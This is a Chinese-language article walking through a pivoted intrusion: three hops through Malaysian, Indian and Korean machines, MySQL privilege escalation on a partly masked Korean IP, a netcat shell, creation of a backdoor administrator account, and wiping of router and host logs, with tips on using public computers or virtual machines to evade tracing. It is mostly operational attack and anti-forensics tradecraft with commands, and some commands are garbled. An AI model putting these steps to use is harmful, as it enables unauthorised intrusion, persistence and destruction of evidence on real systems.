網(wǎng)絡(luò)入侵,安全第一。一個狡猾、高明的入侵者,不會冒然實行動。他們在入侵時前會做足功課,入侵時會通過各種技術(shù)手段保護自己,以防被對方發(fā)現(xiàn),引火燒身。其中,跳板技術(shù)是攻擊者通常采用的技術(shù)。下面筆者結(jié)合實例,解析攻擊入侵中的跳板技術(shù)。
1、確定目標
攻擊者在通過掃描工具進行定點(IP)掃描或者對某IP段掃描的過程中發(fā)現(xiàn)了該系統(tǒng)(服務(wù)器)的某個漏洞,然后準備實施攻擊。
比如,筆者通過對某IP段的掃描,發(fā)現(xiàn)該IP段IP地址為211.52.*.84的主機存在MYSQL漏洞,可以通過提權(quán)獲取系統(tǒng)權(quán)限進而控制該服務(wù)器。
2、設(shè)計跳板
跳板通俗講就是一條通往目標主機的主機鏈,理論上講當(dāng)然是鏈越長就越安全,但是鏈太長的話連接的速度太慢,因為其中的中轉(zhuǎn)太多。攻擊者往往會評估入侵風(fēng)險,從而制定或者設(shè)計跳板。一般的原則是,如果是政府、軍隊等敏感部門往往跳板會比較多,甚至這些跳板主機會縱橫七大洲四大洋。另外,入侵國內(nèi)服務(wù)器往往也會需要國外的跳板主機。
另外跳板主機的選擇,入侵者往往是一些安全性一般速度較快,很少有人光顧的主機。因為如果是跳板出了安全問題,安全人員從中間入手,進行反向追蹤,定位入侵者的相對比較容易。
演示進行入侵檢測的目標主機是一家韓國的服務(wù)器(通過[url]www.ip138.com[/url]查詢),綜合考慮,設(shè)計了三級跳板,即通過三個主機中轉(zhuǎn)在第三級跳板上進行目標主機的入侵就愛你從。設(shè)計的路線為:遠程登陸(3389)到一IP地址為203.176.*.237的馬來西亞服務(wù)器;然后在該服務(wù)器上通過CMD命令登陸到一IP地址為203.115.*.85的印度Cisco路由器;最后該路由器上telnet到一某韓國主機。最后以該韓國服務(wù)器為工作平臺實施MYSQL提權(quán)操作。
特別說明:攻擊者往往在跳板中加入路由器或者交換機(比如Cisco的產(chǎn)品),雖然路由器的日志文件會記錄登陸IP,但是可以通過相關(guān)的命令清除該日志。并且這些日志清除后將永遠消失,因為路由器的日志保存在flash中,一旦刪除將無法恢復(fù)。如果跳板全部用主機的話,雖然也可以清除日志,但是現(xiàn)在的恢復(fù)軟件往往可以恢復(fù)這些日志,就會留下痕跡,網(wǎng)絡(luò)安全人員可以通過這些蛛絲馬跡可能找到自己。
3、跳板入侵
(1).第一跳,遠程桌面
開始→運行→mstsc,打開遠程桌面連接,輸入馬來西亞服務(wù)器的IP地址203.176.*.237,隨后輸入用戶名、密碼即可遠程連接到該服務(wù)器。
一個非常狡猾高明的的入侵者一般不會用自己平時使用的主機進行遠程桌面連接入侵,他們往往通過一些人員流動比較大的公共電腦進行入侵。如果找不到的話,他們一般不會用物理主機,會采用虛擬機系統(tǒng)進行入侵。因為物理主機的入侵會留下痕跡,就算刪除格式化也會被恢復(fù)。而虛擬機,入侵完成后可以刪除,呼之即來,棄之毫不可惜。
(2).第二跳,telnet路由器
打開服務(wù)器命令行工具(cmd),輸入telnet 203.115.*.85進行連接。該路由器是一Cisco設(shè)置了虛擬終端的密碼,輸入密碼進入路由器一般模式。此時即可以通過路由器telnet到下一個跳板。當(dāng)然最好有該cisco路由器的特權(quán)密碼,敲入en,然后輸入特權(quán)密碼進入特權(quán)模式。因為就算沒有進入路由器的特權(quán)模式,但路由器還是記錄了此次登陸,因此一定要進入特權(quán)模式,通過路由器命令清除登陸記錄和歷史命令。筆者為了安全用SecureCRT(類似telnet)進行登陸。
作為一個狡猾的入侵者,在進入路由器特權(quán)模式后,不是馬上進入下一跳板。往往通過show user命令查看有沒有其他人(特別是管理員)登陸到路由器。如果存在其他登陸,一個謹慎的入侵者往往會放棄該跳板轉(zhuǎn)而用其他的跳板。
(3).第三跳,telnet主機
在路由器特權(quán)模式下,輸入telnet 203.115.*.85,隨后輸入用戶名及其密碼后就telnet到遠程主機系統(tǒng)給我們一個shell。
4.提權(quán)
至此,我們經(jīng)過三級跳到達工作平臺,然后就在該shell上進行目標主機的MYSQL提權(quán)操作。操作平臺上筆者已經(jīng)準備好了進行MYSQL提權(quán)的工具。輸入命令進行操作,筆者把相關(guān)的命令列舉出來:
cd msysql
cd bin
mysql -h 211.52.118.84 -uroot
. c:mysqlbin2003.txt
在工作平臺上再打開一個cmd,輸入命令
nc 211.52.118.84 3306
即監(jiān)聽該ip的3306端口,返回一個目標主機的shell,獲取該主機的控制權(quán)。
在該shell上輸入命令建立管理員用戶
net user test test /add
net localgour administrators test /add
下面看看對方是否開了遠程桌面連接,在命令行下敲入命令
netstat -ano
對方開3389端口,即可以進行遠程桌面的連接。
由于對方是XP系統(tǒng),不能多用戶遠程連接,筆者的入侵檢測到此為止。
5、全身而退
入侵完成獲得目標主機的管理權(quán)限,入侵者就得擦除痕跡,準備撤退了。
(1).由于從目標主機獲得的shell反向連接獲得的,不會有日志記錄,所以不用管直接斷開連接。
(2).上傳clearlog工具,清除telnet主機上的登陸日志。
(3).輸入exit,退出路由器到主機的的telnet連接。在路由器上輸入
clear logging
分別用來清除登陸日志。
(4).退出路由器登陸,通過工具清除遠程桌面主機上的登陸日志,然后刪除登錄用帳戶和用戶目錄,注銷用戶。
總結(jié):上面筆者結(jié)合實例演示了入侵者如何通過跳板進行入侵以及入侵善后的全過程,本文只是從技術(shù)的角度對跳板技術(shù)進行解析,目的是讓有興趣的讀者直觀地了解跳板技術(shù)的相關(guān)細節(jié)。當(dāng)然,跳板技術(shù)是博大精深,遠非本文所能囊括,但其基本原來都類似,希望文本對大家了解這種技術(shù)有所幫助。
公眾號
事業(yè)單位
當(dāng)前位置:
公考類
招聘類
各類考試